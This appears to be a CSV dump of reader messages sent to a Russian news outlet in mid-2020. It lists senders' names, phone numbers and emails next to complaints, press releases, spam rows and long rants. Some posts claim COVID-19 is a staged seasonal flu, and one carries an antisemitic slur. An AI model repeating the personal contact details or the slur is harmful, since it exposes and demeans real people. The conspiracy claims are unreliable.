 ... Не будем особо надеяться (даже просто делать вид, из состязательно-лицедейского ""патриотизма"")  и ""уповать""  на  обречённо-вечного _вассала ""бензо-колонии"",_ на вынужденного _""сутенёра матери-Родины""_ (опущенной в конце 80-х; кстати,под ""счастливыми"" насмешками _не менее продажного_ быдла, вечно недовольного ""более богатыми эгоистами"").  Он просто ""фигура в игре"", .. и быть как ""западные вассалы евросоюза""  и меньше чмырить своё быдло -- тоже нЕ от него зависит.  (Видимо, Восток не входит в глобалистские представления о ""золотом миллиарде"". А у советских ядерных боеголовок,припрятанных ""кремлёвскими поцонами""  при ""рейгановском шмоне""  и ""распродаже Родины по-дешёвке"" -- истёк 15летний срок годности  уже при пьяном ельцине!).  

... Будьте востребованным специалистом (хотя бы  ""интеллигентом-жоп@лизом""  или  ""писателем морально-религиозной лапши для быдла"") и тогда вы выйдите из ниши  ""нерентабельных рабов"" (которых ""нужно культурно уничтожить"").  ... Борьбу за ""более приятное существование"" и  естественный ""отсев слабаков""  бог ещё не отменял.  .. Бог не ""фраер"", он такой же ""эгоист"" как и все вы  (""батраки Эволюции"" и ""лживые попугаи Общества""  чмырящие и едящие более слабого),   просто возможностей больше.  
","","2020-06-24 13:40:37",0,d7ee2a9895ca2ee0aaab8d7aeb867687,96407944
457,Тариель Талыбян,+994503167877,ttariyel@box.az,https://kam.business-gazeta.ru/article/461831,"Очередной мировой суперКризис(вторая ""великая депрессия""?) + КоронаШухер(приостановка экономики) + Падение цен на нефть = ???  

Этот ""коронавирус"" -- разновидность (""штамм"") вируса сезонного гриппа (просто -- ""коронованный"" , типа ""могущественный и очень опасный"", для устрашения ""тупого быдла"", чтоб лучше подчинялся, но который однако мало поверил ,в 2001-м, в ""страшных террористов-демонов"",жаждущих  ""всех взорвать и испепелить"", но почему-то  совсем не трогающих  ""главных подлецов-кяфиров"" -- западную ""элиту"" и их собственность,ни ""частную"",ни ""общаково-государственную"").  

Весь этот ""коронаШухер"" ( с ""закулисными слухами"" про ""скрываемую вспышку чумы"" и т.п.) организован  ""однополярнУтыми мировыми паханами"" (которым ""демократическая"" показуха  видимо больше не нужна, особенно на пороге  финансового суперКризиса  с  очередным РЫВКОМ [и даже возможно качественным ""прорывом""]   в  свяшэнном деле _""концентрации мирового капитала""),_  и распространяется *лживыми попугаями-пижонами* (рисующимися ради банального ""центра внимания"" и/или ""косточки"").  У многих даже  ""паника""  это просто беспринципно-подражательные СОСТЯЗАТЕЛЬНЫЕ ПОНТЫ.  (Не будем путать  реальный страх[вируса] -- с [доминантным] лицедейством. Весь Мир -- как большой ""Театр пройдох"",  *где _лживые попугаи_  толпой заклёвывают и затыкают ""белых ворон"").*    

А чего вы ожидали-то  от этого ""эгоистичного Мира подленькой борьбы лживых попугаев"" (где даже  *стандартная*  религия и мораль -- тоже  бесстыже-подражательный обман и подлость , т.е. стандартный ОБМАННЫЙ ПРИЁМ [или просто как банальное ""условно-рефлекторное усиление"" страхов]  в борьбе за ""ситуативное наиприятное"",за превосходство в ""возможностях для удовольствий"", за банальный ""центр внимания"" и более жирную ""косточку"",за ""превосходящее счастье"",   даже среди ""обмануто-стеснительных честных фраеров"",  и даже среди тех  кто ""красиво-уверенно играет и подыгрывает как невникающий попугай"")?!? 

У однополярнутых глобалистов (""мировых паханов"") нет конкурентов, поэтому им  больше нЕ  нужно это ""ускоренное РАЗВИТИЕ ОБЩЕСТВА""  и ""уважительно-демократическое""  управление рабами. Больше уже незачем отказываться от ""блаженства диктатурной власти"". 
) А вообще, ""быдлу"" (как их  заглаза  называют ""управляющие элиты"") всё равно, ктО  их обожравшийся ""рабовладелец""! Чем меньше ""пастухов общества"", тем лучше (для ""быдла"")! Легче терпеть   их высокомерие и понты ""превосходства"" (в этой неизбежной ""Пирамиде Неравенства Возможностей""). Да и СТЕПЕНЬ диктатурной ЭКСПЛУАТАЦИИ при этом меньше (как бы ни пугали нас  свои пастухи   ""страшным Западом""  и ""страшными Глобалистами""). 

 ... Не будем особо надеяться (даже просто делать вид, из состязательно-лицедейского ""патриотизма"")  и ""уповать""  на  обречённо-вечного _вассала ""бензо-колонии"",_ на вынужденного _""сутенёра матери-Родины""_ (опущенной в конце 80-х; кстати,под ""счастливыми"" насмешками _не менее продажного_ быдла, вечно недовольного ""более богатыми эгоистами"").  Он просто ""фигура в игре"", .. и быть как ""западные вассалы евросоюза""  и меньше чмырить своё быдло -- тоже нЕ от него зависит.  (Видимо, Восток не входит в глобалистские представления о ""золотом миллиарде"". А у советских ядерных боеголовок,припрятанных ""кремлёвскими поцонами""  при ""рейгановском шмоне""  и ""распродаже Родины по-дешёвке"" -- истёк 15летний срок годности  уже при пьяном ельцине!).  

... Будьте востребованным специалистом (хотя бы  ""интеллигентом-жоп@лизом""  или  ""писателем морально-религиозной лапши для быдла"") и тогда вы выйдите из ниши  ""нерентабельных рабов"" (которых ""нужно культурно уничтожить"").  ... Борьбу за ""более приятное существование"" и  естественный ""отсев слабаков""  бог ещё не отменял.  .. Бог не ""фраер"", он такой же ""эгоист"" как и все вы  (""батраки Эволюции"" и ""лживые попугаи Общества""  чмырящие и едящие более слабого),   просто возможностей больше.  
","","2020-06-24 14:06:43",0,"4b22001ebf679e679a12f89b1408ffbe",96407944
458,Гость,"9876333333",dShNPaCCnyqQYAT@twitter.example.com,"","В Ульяновске во дворах стоят палатки,где БЕЗ НАБЛЮДАТЕЛЕЙ можно проголосовать. Вот это цирк. И после такого голосования старая бл-дь элка объявит итоги голосования легитимными.Что творит антинародная партия жуликов и убийц ! Не слыханное нарушение избирательного права !","","2020-06-26 08:53:40",0,"6a34c944ed9f399a0a88ab170fb25945",2996519957
459,"","","","","https://www.gazeta.ru/culture/news/2020/06/26/n_14595529.shtml
Адвокат Ефремова заявил, что семья Захарова хочет получить «космическую» компенсацию","","2020-06-26 20:11:50",0,"153b1ffc45251de60909e6dd5bc75af8",2999943405
460,андрей,"","",он не ощутил,а мы ощутили  где бабло морда жидовская,"","2020-06-27 01:24:26",0,d44695cb0a2a18ac46af95f84eabb8c7,3162236709
461,андрей,"","",он не ощутил,а мы ощутили  где бабло морда ,"","2020-06-27 01:25:38",0,d44695cb0a2a18ac46af95f84eabb8c7,3162236709
462,Евгений Аронсон,"89509489315",yevgeniy/aronson@mail.ru,значит можно сидеть в щитках прозрачных ?...   — надевать ли ребёнку на ЕГЭ маску . 4 часа ," ... регион сам будет определять — надевать ли ребенку на ЕГЭ маску и перчатки. Четыре часа провести в маске и перчатках в июле — очень сложно. Тем более что, по прогнозам, будет жаркое лето. Поэтому регион сам будет решать всё по ситуации», — отметил https://iz.ru/1015768/2020-05-26/v-bolshinstve-regionov-vypusknikov-dopustiat-na-ege-bez-masok-i-perchatok мая пройдет всероссийское видеосовещание с региональными министрами образования. По его словам, субъекты сами определят, нужны ли детям в пункте сдачи ЕГЭ маска или перчатки.https://ren.tv/news/v-rossii/703210-glava-rosobrnadzora-rasskazal-o-kontrole-za-zdorovem-uchastnikov-ege","","2020-06-27 03:05:41",0,"82c6650294935e4d6137e8b91c1df897",2956199930
463,Артур,"89509462529",kartur280@gmail.com,Нужен новый прорыв в экономике Республики.,"Темпы развития экономики РТ замедлились и в кризис приобрели отрицательную тенденцию. Необходим новый мощный рывок в будущее как было в начале 90-х. Пока живы инициаторы того периода надо ими воспользоваться.Иначе кризис перейдет в рецессию т.е. депрессию, а это путь к развалу общества (пример: ФК ""Рубин""). Новый ЛОКОМОТИВ выведет экономику из кризиса, как это в своё время сделало СЭЗ(ОЭЗ) ""Алабуга"". Времени на раздумья нет!
Адью Артур Кадыров.","","2020-06-28 23:46:11",0,"4419d3b93a81b68d1550c8f66785f40b",2956682932
464,"","","","",Лялька какая взрослая стала. ,"","2020-06-29 18:24:44",0,d60f014dd62c46e8709746f4b7c25106,2956222809
465,Тариель Талыбян,"",ttariyel@box.az,корона," Очередной мировой суперКризис (""перепроизводства денег""  и ""финансово-кредитных понтов""? ""Великая Депрессия 2.0""?) + КоронаШухер(приостановка экономики) + Падение цен на нефть = ???  

Этот ""коронавирус"" -- разновидность (""штамм"") вируса сезонного гриппа (просто -- ""коронованный"" , типа ""могущественный и очень опасный"", для устрашения ""тупого быдла"", чтоб лучше подчинялся, но который однако мало поверил ,в 2001-м, в ""страшных террористов-демонов"",жаждущих ""всех взорвать и испепелить"", а почему-то совсем не трогающих ""главных подлецов-кяфиров"" -- западную ""элиту"" и их собственность, ни ""частную"",ни ""общаково-государственную"").  

Весь этот ""коронаШухер"" ( с ""закулисными слухами"" про ""скрываемую вспышку чумы"" и т.п.) организован ""однополярнУтыми мировыми паханами"" (которым ""демократическая"" показуха видимо больше не нужна, особенно на пороге финансового суперКризиса с очередным РЫВКОМ [и даже возможно качественным ""прорывом""]  в свяшэнном деле ""концентрации мирового капитала""), и распространяется  лживыми попугаями-пижонами  (рисующимися ради банального ""центра внимания"" и/или ""косточки""). У многих даже ""паника"" это просто беспринципно-подражательные СОСТЯЗАТЕЛЬНЫЕ ПОНТЫ. (Не будем путать реальный страх[вируса] -- с [доминантным] лицедейством. Весь Мир -- как большой ""Театр пройдох"", где лживые попугаи  толпой заклёвывают и затыкают ""белых ворон"").   

А чего вы ожидали-то от этого ""эгоистичного Мира подленькой борьбы лживых попугаев"" (где даже  стандартная  религия и мораль -- тоже бесстыже-подражательный обман и подлость , т.е. стандартный ОБМАННЫЙ ПРИЁМ [или просто как банальное ""условно-рефлекторное усиление"" страхов] в борьбе за ""ситуативное наиприятное"",за превосходство в ""возможностях для удовольствий"", за банальный ""центр внимания"" и более жирную ""косточку"",за ""превосходящее счастье"",  даже среди ""обмануто-стеснительных честных фраеров"", и даже среди тех кто ""красиво-уверенно играет и подыгрывает как невникающий попугай"")?!? 

У однополярнутых глобалистов (""мировых паханов"") нет конкурентов, поэтому им больше нЕ нужно это ""ускоренное РАЗВИТИЕ ОБЩЕСТВА"" и ""уважительно-демократическое"" управление рабами. Больше уже незачем отказываться от ""блаженства диктатурной власти"". 

... Не будем особо надеяться (даже просто делать вид, из состязательно-лицедейского ""патриотизма"") и ""уповать"" на обречённо-вечного  вассала ""бензо-колонии"", на вынужденного ""сутенёра матери-Родины"" (опущенной в конце 80-х; кстати,под ""счастливыми"" насмешками  не менее продажного  быдла, вечно недовольного ""более богатыми эгоистами""). Он просто ""фигура в игре"", .. и быть как ""западные вассалы евросоюза"" и меньше чмырить своё быдло -- тоже нЕ от него зависит. (Видимо, Восток не входит в глобалистские представления о ""золотом миллиарде"". А у советских ядерных боеголовок,припрятанных ""кремлёвскими поцонами"" при ""рейгановском шмоне"" и ""распродаже Родины по-дешёвке"" -- истёк 15летний срок годности уже при пьяном ельцине!).  

) А вообще, ""РАБочему быдлу"" (как их заглаза называют ""управляющие элиты"") всё равно, ктО их обожравшийся ""РАБовладелец""! Чем меньше ""пастухов общества"", тем лучше (для ""быдла"")! Легче терпеть  их высокомерие и понты ""превосходства"" (в этой неизбежной ""Пирамиде Неравенства Возможностей""). Да и СТЕПЕНЬ диктатурной ЭКСПЛУАТАЦИИ при этом меньше (как бы ни пугали нас свои пастухи  ""страшным Западом"" и ""страшными Глобалистами"").  

 Но скорее всего, глобальная элита (""мировые посоны"" с чёткими ""мафиозно-царскими"" понтами , блатная ЧАСТЬ спрут-элиты сша, та ""исторически-организованная"" группировка ""оседлых бандитов: чиновников и олигархов"" , которая ""держит палец на кнопке"" реальных ""ядерных чемоданчиков"" и реально РЕШАЕТ ""кого бомбить"", ""кого тихо наказать"" и ""кому разрешить много зарабатывать"") будет управлять Миром ЧЕРЕЗ гос(нац)-элиты , объединив их под своим флагом ""помощи и защиты"". Обычная Пирамида Управления! Так что, смартфонное быдло ничего и не почувствует кроме ""усиления местного самодурства"" (и то лишь в демократических странах, которые тоже станут де-факто тоталитарными) .

 ... Будьте востребованным специалистом (хотя бы ""интеллигентом-жоп@лизом"" или ""писателем морально-религиозной лапши для быдла"") и тогда вы выйдите из касты ""нерентабельных рабов"" (которых ""нужно культурно уничтожить""). ... Борьбу за ""более приятное существование"" и естественный ""отсев слабаков"" бог ещё не отменял. .. Бог не ""фраер"", он такой же ""кайфоИщущий Эгоист"" как и все вы (""батраки Эволюции"" и ""лживые попугаи Общества"" чмырящие и едящие более слабого),  просто возможности разные.  

Не верьте   красиво-""уверенно"" лгущим попугаям-пижонам (пройдохам-конкурентам в жизненной борьбе за ""более жирную косточку"" и прочее РЕАЛЬНОЕ ""более приятное"" в вашем ""социальном сословии""), в очередной раз полу-осознанно направляющим вас и прочих ""наивных ближних"" на ""борьбу с мельницами,олигархами и законами природы"". 

И  выйдите из  роли  ""морально-обманутого честного фраера-мазохиста"",(пассивно ""страдающего"" в ожидании ""спасительной Любви и Воздаяния""  и трепещущего перед ""стрАшными мерзавцами"").  Чмырить и дрессировать  быдло  отныне будут по-другому.  ","","2020-06-30 04:17:35",0,d7ee2a9895ca2ee0aaab8d7aeb867687,96416443
466,"","","","","и что,
","","2020-07-02 21:27:02",0,bb0acf235483bcb8bad3128e116b20c4,2996503616
467,Марина,"",kistochka1111@gmail.com,""," Добрый день. Я к вам обращаюсь от имени части коллектива школы г. Зеленодольска.  В школе сложилась крайне тяжелая атмосфера. Завуч по учебной части обращается с учителями крайне пренебрежительном тоне , кричит, унижает честь и достоинства учителей. Обращение учителей к директору не получило никакой реакции. Директор сказал, что его это устраивает.К кому мы только не обращались, ноль реакции. Единственный , кто нас поддержал Реском Профсоюза. При проверке они обнаружили много нарушений и превышений полномочий., но воз и ныне там. Вы наша последняя надежда. Надежда на помощь. Все отписки, документы, докладные у нас на руках. Будем признательны за вашу помощь.","","2020-07-03 10:59:02",0,df03f5b666e6eda0e6b7f2597015ad9d,2999820259
468,Булат,"89033439716",tulipu75@mail.ru,Задержка рейса в аэропорту Казань,"Компания Руслайн. Рейс 345 от 03.07.2020г. Отправляемся из Казани в Сочи с пересадкой(!) в Калуге. Рейс должен был вылететь в 7.45. До сих пор не вылетел! Люди сидят в стерильной зоне, информацией не располагают! По слухам у самолета техническая неисправность. со слов пассажиров, выходил представитель авиакомпании и раздал воду с неприятным привкусом (не свежую). После задержки более 6 часов выдали булочку с соком и ""макарошки с мясом"". Обещают отправление рейса каждые пол часа. ","","2020-07-03 14:43:44",0,"94ec3b3c78e5e3413e473249d802a003",520982622
469,Роман,"89033139970",w9033139970@gmail.com,Таттелеком платит налоги в Башкирии ,"Здравствуйте. 
Мне поступл кассовый чек после оплаты услуг Таттелекома в котором указан адрес регистрации Республика Башкирия, город Уфа. Инн 1681000024
Может быть посмотрите причины этой ситуации...",null,"2020-07-05 09:51:57",0,"3a4c0e3eeaeec916b7a8afb0af5fb06f",2999732060
470,Евгений,"89519412017",elesnov@shtrafy-gibdd.ru,Исследование от Штрафы ГИБДД,"Добрый день!
Я автор статей портала Штрафы ГИБДД. Мы ежедневно проверяем штрафы 5 млн автомобилистов и на основе этих данных собираем статистику для СМИ. Недавно выпустили исследование ""Как нарушали пропускной режим в Москве"" :
https://shtrafy-gibdd.ru/articles/issledovanie-kak-narushali-propusknoi-rezhim-v-moskve  

Если интересно, можем выслать вам новое исследование в первую очередь или подготовить данные о штрафах, которые вам нужны.
Что думаете?","","2020-07-06 10:33:57",0,"0f5ba34aa3aa1f93def766c98df849b8",1407075529
471,Елена,+79066317054,Leningrad.2014@mail.ru,Преступление путина,"Присяжная,18-й год репрессий,нарушены все конституционные права,все права человека,18-й год добиваюсь фактического расторжения брака,с великим трудом добилась юридического.Регулярно подвергаюсь угрозам,пыткам.покушениям,насилию,преступному,аморальному вмешательству в жизнь.Заявление.ст.295УКРФ - посягательство на жизнь присяжной,дважды прошло всю судебно-правовую и административно-политическую систему РФ и по результатам обращения было подано на организатора преступления - путина в.в.Требую огласки преступления и возбуждения уголовного дела в отношении путина в.в.
","2023f08a33f507259cab5379d7108a8b","2020-07-06 22:19:58",0,"2023f08a33f507259cab5379d7108a8b",1586021523
472,"","","","","
","","2020-07-08 15:53:30",0,"8765dd2ede777283d96c44594a84554e",1441352797
473,"","","","","
","","2020-07-08 15:53:39",0,"8765dd2ede777283d96c44594a84554e",1441352797
474,"","","","","
","","2020-07-08 15:54:13",0,"8765dd2ede777283d96c44594a84554e",1441352797
475,"","","","","
","","2020-07-08 15:54:18",0,"8765dd2ede777283d96c44594a84554e",1441352797
476,"","","","","
","","2020-07-08 15:54:21",0,"8765dd2ede777283d96c44594a84554e",1441352797
477,"","","","","
","","2020-07-08 15:54:30",0,"8765dd2ede777283d96c44594a84554e",1441352797
478,"","","","","
","","2020-07-08 15:54:34",0,"8765dd2ede777283d96c44594a84554e",1441352797
479,"","","","","
","","2020-07-08 15:54:39",0,"8765dd2ede777283d96c44594a84554e",1441352797
480,"","","","","
","","2020-07-08 15:54:45",0,"8765dd2ede777283d96c44594a84554e",1441352797
481,"","","","","
","","2020-07-08 15:54:46",0,"8765dd2ede777283d96c44594a84554e",1441352797
482,"","","","","
","","2020-07-08 15:54:51",0,"8765dd2ede777283d96c44594a84554e",1441352797
483,"","","","","
","","2020-07-08 15:54:56",0,"8765dd2ede777283d96c44594a84554e",1441352797
484,"","","","","
","","2020-07-08 15:55:02",0,"8765dd2ede777283d96c44594a84554e",1441352797
485,"","","","","
","","2020-07-08 15:55:10",0,"8765dd2ede777283d96c44594a84554e",1441352797
486,"","","","","
","","2020-07-08 15:55:15",0,"8765dd2ede777283d96c44594a84554e",1441352797
487,"","","","","
","","2020-07-08 15:55:44",0,"8765dd2ede777283d96c44594a84554e",1441352797
488,"","","","","
","","2020-07-08 15:55:47",0,"8765dd2ede777283d96c44594a84554e",1441352797
489,"","","","","
","","2020-07-08 15:55:48",0,"8765dd2ede777283d96c44594a84554e",1441352797
490,"","","","","
","","2020-07-08 15:55:53",0,"8765dd2ede777283d96c44594a84554e",1441352797
491,"","","","","
","","2020-07-08 15:55:59",0,"8765dd2ede777283d96c44594a84554e",1441352797
492,"","","","","
","","2020-07-08 15:56:03",0,"8765dd2ede777283d96c44594a84554e",1441352797
493,"","","","","
","","2020-07-08 15:56:07",0,"8765dd2ede777283d96c44594a84554e",1441352797
494,"","","","","
","","2020-07-08 15:57:13",0,"8765dd2ede777283d96c44594a84554e",1441352797
495,"","","","","
","","2020-07-08 15:57:18",0,"8765dd2ede777283d96c44594a84554e",1441352797
496,"","","","","
","","2020-07-08 15:57:18",0,"8765dd2ede777283d96c44594a84554e",1441352797
497,"","","","","
","","2020-07-08 15:57:23",0,"8765dd2ede777283d96c44594a84554e",1441352797
498,"","","","","
","","2020-07-08 15:57:23",0,"8765dd2ede777283d96c44594a84554e",1441352797
499,"","","","","
","","2020-07-08 15:57:29",0,"8765dd2ede777283d96c44594a84554e",1441352797
500,"","","","","
","","2020-07-08 15:57:33",0,"8765dd2ede777283d96c44594a84554e",1441352797
501,"","","","","
","","2020-07-08 15:57:37",0,"8765dd2ede777283d96c44594a84554e",1441352797
502,Alegria,"89674747156",pr-dpr@yandex.ru,Alegria: 85% новостроек в Испании распроданы," 
Alegria: 85% новостроек в Испании распроданы
10.07.2020. Москва. «85% новостроек в провинции Аликанте (Испания) распроданы, - заявил Ян Вайнрух, генеральный директор девелоперской компании Alegria на круглом столе «Рынок испанской недвижимости после COVID-19. Ситуация в регионах», который прошел в рамках выставки MIPIF online EXPO. Alegria является членом региональный ассоциации девелоперов побережья Коста-Бланка и специализируется на оказании услуг русскоязычным эмигрантам в Испании.

Крупномасштабная встреча представителей международного рынка недвижимости и их российских партнёров посвящена обсуждению последствий пандемии и антикризисным мерам, принятым в девелоперском секторе.
 
Это первая международная выставка зарубежной недвижимости, прошедшая в онлайн формате при закрытых национальных границах. В ней приняли участие 48 компаний и 124 эксперта из 22 стран. Выставка прошла на русском языке, и ее посетили 20 тысяч человек со всего мира, в том числе и России.
 
Сейчас, когда количество сделок на рынке сократилось из-за пандемии, а продажи продолжают совершаться дистанционно (только компанией Alegria в Испании за время локдауна было продано 20 объектов онлайн), выставка призвана информировать бизнес-сообщество о возможностях такого вида продаж, а также о ситуации на национальных рынках.
 
На рынке Испании за время карантина сформировался отложенный спрос. И так как от россиян поступило большое количество обращений, связанных с инвестированием в недвижимость страны, а также - приобретением собственности для переезда на ВНЖ, то после открытия границ Alegria ожидает значительный приток покупателей из России. Их интерес был связан не только с объектами новостроек, но и - вторичного рынка.
 
Генеральный директор компании Ян Вайнрух подчеркнул важность проведения выставки в условиях выхода из карантина. «Выставка призвана объединить опыт международных девелоперов для выработки антикризисных мер, - продолжил Ян Вайнрух, - В новых условиях выстояли те компании, которые активно продолжили свою деятельность онлайн, используя инновационные средства для продвижения своих услуг и недвижимости. А их применение позволило покупателям быть в курсе самых лучших предложений на мировом рынке».

***
Справка. О компании Alegria 
Alegria – ведущее агентство недвижимости, застройщик и девелопер на побережье Коста-Бланка в Испании. Компания основана в 2011 году и работает с более чем 20 странами мира, в т.ч. с Россией и Украиной. Головной офис - в Торревьехе, в штате - свыше 60 человек.
Компания специализируется на оказании услуг иностранцам/эмигрантам в Испании. С ее помощью уже свыше 3,5 тыс. иностранцев приобрели или сняли жилье на побережье Коста-Бланка. Руководство компании ежегодно инвестирует более 2 млн евро в разработку и внедрение новых сервисов для комфортного проживания эмигрантов в стране.
Сейчас в активе девелопера почти 54 тыс кв м недвижимости эконом, комфорт и бизнес-класса, а также коммерческие объекты. 25 новостроек возведены по эксклюзивным проектам на собственных землях в Торревьехе, Бенидорме, Аликанте, Ла Мате и других городах региона.
Alegria активно сотрудничает с русскоязычным сообществом Испании, имеет широкую агентскую сеть в более чем 40 городах России. В портфеле российского отделения компании – свыше 30 видов услуг (включая риэлтерские, юридические, иммиграционные, бытовые и др.), около половины которых предоставляется бесплатно.
Alegria предлагает комфортабельное жилье, доступное широкому кругу россиян: квартиры, дома, виллы, бунгало, таунхаусы (цены на первичное жилье – от € 90 тыс., на вторичное – от € 24 тыс., аренда – от € 120/неделя).

PR-manager
https://alegria-realestate.com/ru/
Email: pr-dpr@yandex.ru
Mob, WhatsApp: +79674747156


","78cdd31eca17d1b8bc452a84c83aa911","2020-07-10 13:40:35",92575,"78cdd31eca17d1b8bc452a84c83aa911",2956686231
503,Денис,"",kovarsky.denis@gmail.com,Фонд Art Russe не получил ответа на обращение с предложением выкупить демонтируемый в США монумент Теодору Рузвельту.,"В период 29 июня-6 июля 2000 г. директор Фонда Art Russe Рена Лавери
направила соответствующие письма уполномоченным представителям мэрии
Нью-Йорка и Американского музея естественной истории. Обращения были
отправлены в адрес мэра города Билла де Базио ( Bill de Basio), президенту
Американского музея естественной истории Эллен В. Футтенр (Ellen V Futter) и
членам Попечительского совета музея Теодору Рузвельту IV (Theodore
Roosevelt IV) и Льюису В. Бернарду (Lewis W Bernard).
В своем обращении Фонд Art Russe выразил готовность выкупить монумент 26-
му президенту США Теодору Рузвельту и взять на себя все сопутствующие
расходы. «Г-н Рузвельт является важным политическим деятелем, связанным с
Россией на разных этапах развития истории двух стран», - отмечается в
обращении Фонда. Учитывая историческую и художественную ценность
монумента, защита и сохранение данного скульптурного произведения
«критически важны для будущих поколений».
Фонд Art Russe также обратился к мэру г.Ситка Гэри Пэкстону (Gary Paxton) и
главе городской администрации Джону Личу (John Leach), выразив
заинтересованность в приобретении памятника правителю русских поселений в
Северной Америке Александру Баранову, который, по мнению Фонда,
«олицетворяет значимый период истории отношений России и США в начале
XIX века». В ответном письме г-н Лич заверил Фонд, что судьба памятника
будет решаться «с помощью общественного процесса, конструктивно,
цивилизованно, уважительно к истории в данном деликатном вопросе».
Фонд Art Russe подтверждает свои намерения приобрести данные монументы
для сохранения истории отношений России и Америки и в интересах будущих
поколений.
Информация для СМИ
Теодор Рузвельт (27.10.1858-06.01.1919) – президент США в период 19901-
1909 гг. В 1905 году принял активное участие в подготовке и проведении
мирных переговоров между Россией и Японией, находящихся в состоянии
войны. Портсмутский мирный договор (подписан 23 августа 1905 года
председателем Совета министров Российской империи С.Ю. Витте и послом
России с США Р.Р.Розеном и министром иностранных дел Японии Комурой
Дзютаро и послом Японии в США Такахирой Когоро) положил конец тяжелой
для России Русско-Японской войне и был заключен на максимально выгодных
для России условиях. Впоследствии итоги переговоров были названы
современниками вершиной дипломатической карьеры С.Ю. Витте, а Теодор

Рузвельт за посредническую роль в подписании мирного соглашения стал
лауреатом Нобелевской премии мира за 1906 год.
Александр Андреевич Баранов (1746 ‒ 16.4.1819) - первый главный
правитель русских поселений в Америке (1790‒1818). До 1790 занимался
торгово-промышленной деятельностью в Москве, Петербурге и Сибири.
Благодаря энергии и административным способностям А.А.Баранова
значительно расширились торговые связи североамериканских русских
поселений с Калифорнией, Гавайскими островами и Китаем; были созданы
новые поселения, снаряжен ряд экспедиций для обследования районов
Тихоокеанского побережья, положено начало кораблестроению,
медеплавильному производству и добыче угля в русской Америке,
организована школа на Аляске и пр. Баранов участвовал в обследовании и
описании Чугачского залива, прилегающих островов и других районов. Именем
Баранова назван остров в архипелаге Александра (в заливе Аляска).

О Фонде Art Russe
Фонд основан предпринимателем Андреем Филатовым в 2012 году для
реализации просветительских проектов, направленных на поддержку и
популяризацию русского искусства ХХ века. Собрание Фонда включает работы
мастеров различных жанров, созданные в период 1917-1991 гг. Фонд ставит
своей целью информирование международной аудитории о русском искусстве
этого периода путем поддержки выставочных проектов, предоставления работ
для экспонирования российским и зарубежным музеям и галереям. Важным
направлением деятельности Фонда является издание книг и каталогов о
художниках в рамках собственного издательского проекта.",null,"2020-07-10 14:48:41",0,d730f044a600c724c3ac8be42cc4fb7b,1533751605
504,"","","","В челнах и автомат, и поножовщина",https://www.yaplakal.com/forum3/topic2140445.html,"","2020-07-10 15:12:09",0,"2a7b1ac087cb97d2a90f5e95ad309b89",1598975762
505,Сергей,"",serg.kzn@mail.ru,Правительство объявило о начале реализации проекта трассы Москва — Казань  ,https://www.rbc.ru/rbcfreenews/5f0854d49a794794817ac79e?from=newsfeed,"","2020-07-10 17:44:35",0,"9bbb3e50531c6e432a68238e04227d58",1435239349
506,Vitael',"0912345678",Vitael69@yandex.ru,Обвиненипе в преступлениях против человечества.,"... - ""взимать не сотворив"" или ""ИМЕТЬ не создавая"" - БОГ так не умеет, поэтому он в гневе: травит, топит, давит, выжигает...
-----
Переводя с физической реальности в религиозную абстрактность; - БОГА НЕ ОБМАНЕШЬ.
----
""Благими намерениями инвесторов, посулами правителей вымощена дорожка в АД,
ибо, на чужом горбу в РАЙ не приедешь"".
-----
https://www.youtube.com/watch?v=2P0DNyWummk
https://www.youtube.com/watch?v=fgRUpBXuNDE 
https://zen.yandex.ru/media/kas/bolezn-kapitalizm-5e11cfdde4fff000addeb258 
https://www.youtube.com/watch?v=fHNQ_3e77Io 

Тому причина катаклизмам,
что болен Мир капитализмом.
Для Мироздания не будет по-другому,
как на планете паразит стал выше бога.
Vitael' 

Я называю это нанесением всему УЩЕРБА, 
для привлечения дорогих кредитов от МВФ, 
на возмещение инвестиций в бумажки ФРС. 
(климатическое оружие в действии)

https://www.youtube.com/watch?v=-nLTErLziIo 
https://www.youtube.com/watch?v=t1RlE-cfGpU 
https://www.youtube.com/watch?v=JShvQB4tVRU 
https://www.youtube.com/watch?v=bXzSa6-3fEc 
http://maxpark.com/community/4109/content/2491019 
https://elhow.ru/images/extra_articles/0/1/145/inner/8.jpg 
https://www.youtube.com/watch?v=iInO8IAKDLY&list=PLxwYr8OyryulYIKGeJaaK7BJx8IPIxyd7

***
Выводы Vitael' как предписания:
Капитализму есть причина, это
- ДАРМОВЩИНА для элиты, мягко выражаясь.
- ПОРАБОЩЕНИЕ населения, грубо говоря.
-----
Деньги - доллары, евро, юани, рубли и прочие деривативы,
а так же, векселя, акции, облигации и прочие ""Ц-бумажки"", это мягко выражаясь;
- сливкам общества талон на молоко за вредность. Или,
- билетик для проезда в РАЙ, на чужом горбу. 
А грубо говоря;
Деньги - доллары, евро, юани, рубли и прочие деривативы,
а также векселя, акции, облигации и прочие ""Ц-бумажки"",
это ""мёртвые души и легализованный им не трудовой доход"", то есть, 
инструмент циничного разбоя, насилия, грабежа всего и вся.
Орудие фашистского порабощения, частной тирании, социальной деспотии.
Глухонемой язык диктатуры оголтелой лжи.
Причина национальной розни, социального расслоения, нравственного разложения, морального упадка, и как следствие — деградация общества, распад, разорение, миграция, опустошение, забвение...

***
Другими словами; - шизоиды-маразматики, дегенераты из ФРС, МВФ, а, Банк России это региональный банк МВБ, штампуют ничем не обеспеченную макулатуру, и своей ДЕРЬМОкратией понуждают ЧЕЛОВЕЧЕСТВО ГРОБИТЬ СЕБЯ, своих детей, свою среду обитания, своё будущее, для обеспечения доходности этих бумажек, пластиков и прочей хрени… 
-----
И этой своей КРЕДИТНОЙ МАКУЛАТУРОЙ 
ДЕГЕНЕРАТЫ ФАШИСТКОЙ КЛЕПТОКРАТИИ 
обеспечивают свою частную похоть - ДИКТАТУРУ.
https://www.youtube.com/watch?v=LRDyW-gLatE 
https://www.youtube.com/watch?v=mjViofJId1w 
-----
Для них ЧЕЛОВЕЧЕСТВО это ЖИВАЯ ЖЕРТВА, которое ценой своей жизни обеспечивает ДАРМОВУЮ НАЖИВУ их ""инвесторов-хозяев"" учредителей этого «биржевого лохотрона». http://perevodika.ru/articles/23506.html 

***
Vitael'
И если по Миру, английской матрицей морально-нравственного воспитания “высокомерного образования”, вершит Америка “воинственно - демократично” http://oko-planet.su/politik/politikday/139176-mirovoy-agressor-ssha-prestupleniya-amerikanskogo-rezhima.html 
----
Кричевский сравнил современную экономическую мировую структуру с тактикой средневековых захватов и порабощений.
http://newsland.com/news/detail/id/1402972/ — Нынешняя экономическая политика Запада в отношении новых экономик представляет собой современную версию средневекового порабощения: несмотря на то, что развивающиеся государства формально сохраняют независимость, цель остается прежней – увеличение богатств в одних странах и консервация отсталости в других. 
